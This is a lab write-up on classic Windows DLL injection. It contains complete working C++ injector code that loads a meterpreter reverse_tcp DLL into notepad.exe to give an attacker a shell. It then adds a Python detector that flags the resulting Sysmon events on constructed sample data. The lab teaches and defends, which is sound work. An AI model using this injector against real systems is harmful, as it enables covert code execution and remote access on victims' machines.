DLL Injection
Injecting DLL into a remote process.
This lab performs a classic DLL injection into a remote process: the injector writes the path of a DLL into the target's address space and then creates a remote thread whose start routine is `LoadLibraryW`, so the target process loads the DLL itself.

Execution

inject-dll.cpp

```cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
	HANDLE processHandle;
	PVOID remoteBuffer;
	// Wide string, because the remote thread start routine is LoadLibraryW
	wchar_t dllPath[] = L"C:\\experiments\\evilm64.dll";

	if (argc < 2) {
		printf("Usage: %s <PID>\n", argv[0]);
		return 1;
	}
	printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
	// Full access is convenient for a lab; a narrower mask (VM_OPERATION | VM_WRITE | CREATE_THREAD | QUERY_INFORMATION) also works
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
	if (processHandle == NULL) {
		printf("OpenProcess failed: %lu\n", GetLastError());
		return 1;
	}
	// Allocate a writable buffer in the target and copy the DLL path (including the terminating NUL) into it
	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
	// kernel32.dll is mapped at the same base in every process, so the local address of LoadLibraryW is valid in the target
	PTHREAD_START_ROUTINE threadStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
	// The new thread runs LoadLibraryW(remoteBuffer) inside the target, which loads evilm64.dll and runs its DllMain
	CreateRemoteThread(processHandle, NULL, 0, threadStartRoutineAddress, remoteBuffer, 0, NULL);
	CloseHandle(processHandle);
	return 0;
}
```
Compiling the above code and executing it with the argument 4892, the PID of the notepad.exe process on the victim system:

```
PS C:\experiments\inject1\x64\Debug> .\inject1.exe 4892
Injecting DLL to PID: 4892
```
After the DLL is successfully injected, the attacker receives a meterpreter session from the injected process, running with that process's privileges. The two artifacts used in the lab:

- inject1.exe (60KB): the DLL injector compiled from the code above
- evilm64.dll (5KB): the injected DLL at c:\experiments\evilm64.dll, a windows/x64/meterpreter/reverse_tcp payload

Observations

Note how notepad spawned rundll32, which then spawned cmd.exe. This is the meterpreter payload (and the attacker's shell command) executing as part of evilm64.dll inside the notepad process; the process tree, not the injector, is what a defender sees after the fact.
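The two artifacts this lab leaves behind, a remote thread in notepad.exe whose start function is LoadLibraryW and the notepad.exe → rundll32.exe → cmd.exe process chain, are exactly what Sysmon records as Event ID 8 (CreateRemoteThread) and Event ID 1 (ProcessCreate). The detection logic below is an added example, not part of the original lab: the records are constructed to mirror this lab (only PID 4892 and the image paths come from the page; the other PIDs are made up), the field names are assumed to match Sysmon's, and the helper names are mine.

```python
"""Toy detector for CreateRemoteThread + LoadLibraryW DLL injection.

Works over dicts modelled on Sysmon Event ID 8 (CreateRemoteThread) and
Event ID 1 (ProcessCreate). All records below are constructed for this
example, not captured from a real host.
"""

# Constructed sample events (Sysmon-style field names are an assumption).
EVENTS = [
    {"EventID": 1, "ProcessId": 4892, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 5100, "ParentProcessId": 1400,
     "Image": r"C:\experiments\inject1\x64\Debug\inject1.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # EID 8: the injector's CreateRemoteThread into notepad, start routine LoadLibraryW
    {"EventID": 8, "SourceProcessId": 5100,
     "SourceImage": r"C:\experiments\inject1\x64\Debug\inject1.exe",
     "TargetProcessId": 4892, "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryW"},
    # The meterpreter DLL's DllMain spawning rundll32, which spawns the attacker's shell
    {"EventID": 1, "ProcessId": 5212, "ParentProcessId": 4892,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 1, "ProcessId": 5300, "ParentProcessId": 5212,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
    # Benign noise: a cmd.exe started from explorer should not be flagged
    {"EventID": 1, "ProcessId": 6000, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _base(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def remote_loadlibrary_threads(events):
    """(source pid, target pid) for every EID 8 whose start routine is LoadLibrary*.

    A thread started at LoadLibraryA/W in another process is the signature of
    the classic injector on this page; legitimate software almost never does it.
    """
    hits = []
    for e in events:
        if e.get("EventID") != 8:
            continue
        if e.get("StartFunction", "").startswith("LoadLibrary"):
            hits.append((e["SourceProcessId"], e["TargetProcessId"]))
    return hits


def suspicious_chains(events, chain=("notepad.exe", "rundll32.exe", "cmd.exe")):
    """Return pid tuples (root, ..., leaf) whose ancestry matches `chain` exactly.

    Walks parent links upward from every process whose image is chain[-1];
    a missing ancestor (parent not in the log) simply ends the match.
    """
    procs = {e["ProcessId"]: e for e in events if e.get("EventID") == 1}
    hits = []
    for pid, e in procs.items():
        if _base(e["Image"]) != chain[-1]:
            continue
        path, cur, matched = [pid], e, True
        for want in reversed(chain[:-1]):
            parent = procs.get(cur["ParentProcessId"])
            if parent is None or _base(parent["Image"]) != want:
                matched = False
                break
            path.append(parent["ProcessId"])
            cur = parent
        if matched:
            hits.append(tuple(reversed(path)))
    return hits


def correlate(events):
    """Join a LoadLibrary remote thread with a suspicious chain rooted in its target."""
    chains = suspicious_chains(events)
    alerts = []
    for injector_pid, target_pid in remote_loadlibrary_threads(events):
        for c in chains:
            if c[0] == target_pid:
                alerts.append({"injector_pid": injector_pid, "target_pid": target_pid, "chain": c})
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```

The EID 8 check alone is the higher-fidelity signal; the process chain is what remains visible if the injector ran before logging started or if the thread was created some other way.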

References

GetProcAddress: https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
LoadLibrary: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx